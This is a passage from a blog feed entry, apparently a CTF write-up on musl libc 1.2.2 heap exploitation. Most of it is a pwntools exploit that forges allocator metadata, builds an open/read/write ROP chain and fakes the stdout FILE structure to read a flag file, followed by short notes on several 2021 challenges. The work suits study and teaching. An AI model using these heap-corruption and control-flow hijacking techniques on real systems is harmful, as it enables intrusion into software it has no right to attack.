class="string">'\x00'</span>, length=<span class="number">0x1000</span>-<span class="number">0x30</span>) </span><br><span class="line"><span class="comment"># fake meta_arena</span></span><br><span class="line">pp += p64(secret) <span class="comment"># area->check</span></span><br><span class="line"><span class="comment"># fake meta</span></span><br><span class="line">pp += flat([<span class="number">0</span>, <span class="number">0</span>, <span class="comment"># meta->prev, meta->next</span></span><br><span class="line"> fake_meta_ptr, <span class="comment"># meta->mem</span></span><br><span class="line"> <span class="number">0</span>, <span class="comment"># meta->avail_mask, meta->freed_mask</span></span><br><span class="line"> (<span class="number">24</span><<<span class="number">6</span>)+<span class="number">1</span> <span class="comment"># meta->sizeclass, meta->last_idx </span></span><br><span class="line"> ])</span><br><span class="line">leak(<span class="string">'fake_meta'</span>,fake_meta)</span><br><span class="line">leak(<span class="string">'fake_meta_ptr'</span>,fake_meta_ptr)</span><br><span class="line"><span class="comment">#edit chunk0</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x1000</span>,pp) <span class="comment"># write fake meta to chunk0</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># insert fake meta</span></span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#edit chunk0(fake meta->mem to __stdout_FILE) // uaf bin attack</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">'\x00'</span>*(<span class="number">0x1000</span>-<span class="number">0x40</span>+<span class="number">8</span>) + flat([<span 
class="number">0</span>, <span class="number">0</span>, libc.symbols[<span class="string">"__stdout_FILE"</span>]-<span class="number">0x940</span>, <span class="number">2</span>, (<span class="number">24</span><<<span class="number">6</span>)+<span class="number">1</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment"># =====================================================================================</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### Build orw ROP</span></span><br><span class="line"></span><br><span class="line">buf = mmap_base + <span class="number">0x2aa0</span></span><br><span class="line">leak(<span class="string">'buf'</span>,buf)</span><br><span class="line">rop_chain = mmap_base + <span class="number">0x2ba0</span></span><br><span class="line">leak(<span class="string">'rop_chain'</span>,rop_chain)</span><br><span class="line"></span><br><span class="line">pop_rdi = libc.address + <span class="number">0x15536</span></span><br><span class="line">pop_rsi = libc.address + <span class="number">0x1b3a9</span></span><br><span class="line">pop_rdx = libc.address + <span class="number">0x4727c</span></span><br><span class="line">xchg_eax_edi = libc.address + <span class="number">0x26e75</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">open</span> = libc.symbols[<span class="string">"open"</span>]</span><br><span class="line">read = libc.symbols[<span class="string">"read"</span>]</span><br><span class="line">write = libc.symbols[<span class="string">"write"</span>]</span><br><span class="line"></span><br><span class="line">rop = flat([</span><br><span class="line"> pop_rdi, buf,</span><br><span class="line"> pop_rsi, <span class="number">0</span>,</span><br><span class="line"> <span class="built_in">open</span>, <span class="comment"># open("/flag", 0)</span></span><br><span class="line"> xchg_eax_edi, <span 
class="comment">#xchg edi,eax; ret</span></span><br><span class="line"> pop_rsi, buf,</span><br><span class="line"> pop_rdx, <span class="number">0x100</span>,</span><br><span class="line"> read, <span class="comment"># read(fd, buf, 0x100)</span></span><br><span class="line"> pop_rdi, <span class="number">1</span>,</span><br><span class="line"> pop_rsi, buf,</span><br><span class="line"> pop_rdx, <span class="number">0x100</span>,</span><br><span class="line"> write, <span class="comment"># write(1, buf, 0x100)</span></span><br><span class="line">])</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">b"/flag"</span>.ljust(<span class="number">0x100</span>, <span class="string">'\x00'</span>) + rop)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =============================================================================</span></span><br><span class="line"><span class="comment">### Build fake __stdout_FILE</span></span><br><span class="line"><span class="comment"># 0x15238: ret; </span></span><br><span class="line">ret = libc.address + <span class="number">0x15238</span></span><br><span class="line"><span class="comment"># 0x4bcf3: mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38]; </span></span><br><span class="line">stack_mig = libc.address + <span class="number">0x4bcf3</span></span><br><span class="line"></span><br><span class="line">stdout = flat({</span><br><span class="line"> <span class="number">0x20</span>: <span class="number">1</span>, <span class="comment"># f->wpos</span></span><br><span class="line"> <span class="number">0x28</span>: <span class="number">1</span>, <span class="comment"># f->wend</span></span><br><span class="line"> <span class="number">0x30</span>: rop_chain, </span><br><span class="line"> <span class="number">0x38</span>: ret, </span><br><span class="line"> <span class="number">0x48</span>: stack_mig <span 
class="comment"># f->write</span></span><br><span class="line">},filler=<span class="string">'V'</span>)</span><br><span class="line"><span class="built_in">print</span> stdout</span><br><span class="line"><span class="comment">### Overwrite __stdout_FILE</span></span><br><span class="line">add(<span class="number">0x800</span>, stdout)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h3 id="疑问"><a href="#疑问" class="headerlink" title="Questions"></a><strong>Questions</strong></h3><p>Why does adding a 0x800-sized chunk land directly on stdout_FILE, rather than starting from the beginning of the freed 0x1000 chunk (stdout_FILE - 0x940)?</p><p>Why does content_chunk5 (0x1000) need p32(5) written at offset 0x238 at the very start? Presumably to bypass a check during free, given that its header offset was changed from 0x1550 to 1000.</p><hr><p>强网杯 (QWB) 2021 easyheap</p><p><a href="https://cy2cs.top/2021/06/16/%E3%80%90ctf%E3%80%91%E5%BC%BA%E7%BD%91%E6%9D%AF-2021-easyheap/">https://cy2cs.top/2021/06/16/%E3%80%90ctf%E3%80%91%E5%BC%BA%E7%BD%91%E6%9D%AF-2021-easyheap/</a></p><p>DefCon_Quals_2021_mooosl</p><p><a href="https://www.anquanke.com/post/id/241104#h2-0">https://www.anquanke.com/post/id/241104#h2-0</a></p><p>RCTF_2021_musl</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$./libc.so </span><br><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br></pre></td></tr></table></figure><p>Static analysis</p><p>execve is disabled</p><p>Chunks can only be written in add</p><p>idx<=15</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span 
class="keyword">struct</span> <span class="title">manage_chunk</span>{</span> <span class="comment">// 0xc (8+4): the 4-byte field is reused</span></span><br><span class="line"><span class="keyword">void</span> *content_chunk_ptr; </span><br><span class="line"> <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> size - <span class="number">1</span>;</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>free content_chunk</p><p>free manage_chunk</p><p>show any number of times</p><p>BSides Noida CTF baby_musl</p><p>musl pwn: hijacking the exit function</p>]]></content>
<summary type="html"><blockquote>
<p>I plan to reproduce 5 musl pwn challenges, 4 of which are on version 1.2.2. I honestly cannot get through the source, so as when I learned glibc, I go straight to gdb and read the data to understand the structures and memory management. musl has no malloc_hook or free_hook, so with all protections enabled one usually can only attack the FILE structure. Start with version 1.1.24, which is similar to glibc.</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
</feed>